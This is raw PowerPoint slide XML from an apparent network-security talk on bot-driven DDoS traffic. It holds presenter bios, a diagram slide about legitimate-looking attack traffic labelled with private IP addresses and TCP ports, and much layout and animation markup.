          <a:xfrm>
            <a:off x="3594100" y="1054100"/>
            <a:ext cx="1384300" cy="989013"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1385686" cy="990127"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15382" name="AutoShape 22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1385686" cy="9901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800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8351" y="2294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="6319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370" y="2294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4627" y="7617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3721" y="11774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="14586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5666" y="13936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4761" y="17617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7714" y="15626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8484" y="21599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10531" y="14934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13246" y="19736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14019" y="14456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18144" y="18094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16836" y="12941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21599" y="13289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17606" y="10474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21096" y="8136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16701" y="7314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18379" y="4456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14154" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14521" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFB00"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15383" name="AutoShape 23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="293722" y="315763"/>
              <a:ext cx="780857" cy="2970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marL="46038" algn="ctr" defTabSz="914400">
                <a:buClr>
                  <a:srgbClr val="424242"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="424242"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874920" y="6506666"/>
            <a:ext cx="2909646" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>*Originally presented by Roland Dobbins at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>AusNOG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149272528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5367"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15367"/>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15378"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15378"/>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15381"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15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Presenters Background</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="4985980"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Dan Holden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>20 years in InfoSec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>15 years in IDS/IPS industry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>6 years writing signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Both C &amp; regex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ASERT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>DVLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> &amp; ZDI, X-Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Elizabeth Martin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>17 years in InfoSec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First Skills:  Firewalls &amp; Networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First Love:  IDS &amp; Picking Apart Packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Predominately Professional Services Background</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14228957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AutoShape 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="520700" y="-103032"/>
            <a:ext cx="8623300" cy="114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39688" defTabSz="914400">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bot-Generated Attack Traffic Can Look Perfectly Legitimate - Non-Spoofed, TCP, HTTP!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4468813" y="6565900"/>
            <a:ext cx="255587" cy="236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584200"/>
            <a:fld id="{5FB225C9-54AA-9842-8DDE-597CA0C239D6}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr" defTabSz="584200"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16387" name="Picture 3"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425700"/>
            <a:ext cx="965200" cy="774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16388" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3640138" y="1042988"/>
            <a:ext cx="1296987" cy="788987"/>
            <a:chOff x="0" y="2908"/>
            <a:chExt cx="1297706" cy="788783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16389" name="Picture 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3690"/>
              <a:ext cx="1206500" cy="508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390" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5731" y="2908"/>
              <a:ext cx="1291975" cy="2989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39688" algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>172.19.21.144</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16391" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4025900" y="3198813"/>
            <a:ext cx="603250" cy="2590800"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="604574" cy="2590778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16392" name="Line 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="-1" y="0"/>
              <a:ext cx="2" cy="2082801"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="00F9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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16393" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="304800" y="0"/>
              <a:ext cx="221" cy="2247901"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="00F9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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16394" name="Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="571499" y="0"/>
              <a:ext cx="33074" cy="2590778"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="00F9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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16395" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="5181600"/>
            <a:ext cx="1193800" cy="1206500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1193801" cy="1206501"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16396" name="Picture 12"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95899" cy="7106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397" name="Picture 13"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951" y="247935"/>
              <a:ext cx="695899" cy="7106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398" name="Picture 1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7902" y="495870"/>
              <a:ext cx="695899" cy="7106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16399" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3370263" y="3914775"/>
            <a:ext cx="1841500" cy="889000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1841501" cy="889001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16400" name="Picture 16" descr="10436_11_2004_ Giancarlo_WWAC.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41501" cy="889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401" name="AutoShape 17"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="366486" y="218370"/>
              <a:ext cx="1116657" cy="4741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marL="25400" algn="ctr" defTabSz="914400">
                <a:buClr>
                  <a:srgbClr val="FFFFFF"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Internet</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16402" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="2324100"/>
            <a:ext cx="1384300" cy="989013"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1385686" cy="990127"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16403" name="AutoShape 19"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1385686" cy="9901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800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8351" y="2294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="6319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370" y="2294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4627" y="7617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3721" y="11774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="14586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5666" y="13936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4761" y="17617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7714" y="15626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8484" y="21599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10531" y="14934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13246" y="19736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14019" y="14456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18144" y="18094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16836" y="12941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21599" y="13289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17606" y="10474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21096" y="8136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16701" y="7314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18379" y="4456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14154" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14521" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFB00"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16404" name="AutoShape 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="293722" y="315763"/>
              <a:ext cx="780857" cy="2970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marL="46038" algn="ctr" defTabSz="914400">
                <a:buClr>
                  <a:srgbClr val="424242"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="424242"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16405" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3594100" y="1054100"/>
            <a:ext cx="1384300" cy="989013"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1385686" cy="990127"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16406" name="AutoShape 22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1385686" cy="9901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800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8351" y="2294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="6319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370" y="2294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4627" y="7617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3721" y="11774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="14586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5666" y="13936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4761" y="17617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7714" y="15626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8484" y="21599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10531" y="14934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13246" y="19736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14019" y="14456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18144" y="18094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16836" y="12941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21599" y="13289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17606" y="10474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21096" y="8136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16701" y="7314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18379" y="4456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14154" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14521" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFB00"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16407" name="AutoShape 23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="293722" y="315763"/>
              <a:ext cx="780857" cy="2970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marL="46038" algn="ctr" defTabSz="914400">
                <a:buClr>
                  <a:srgbClr val="424242"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="424242"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16408" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-212438" y="4773632"/>
            <a:ext cx="4390738" cy="50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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>10.45.18.54  to 172.19.21.144</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> port 1024, TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
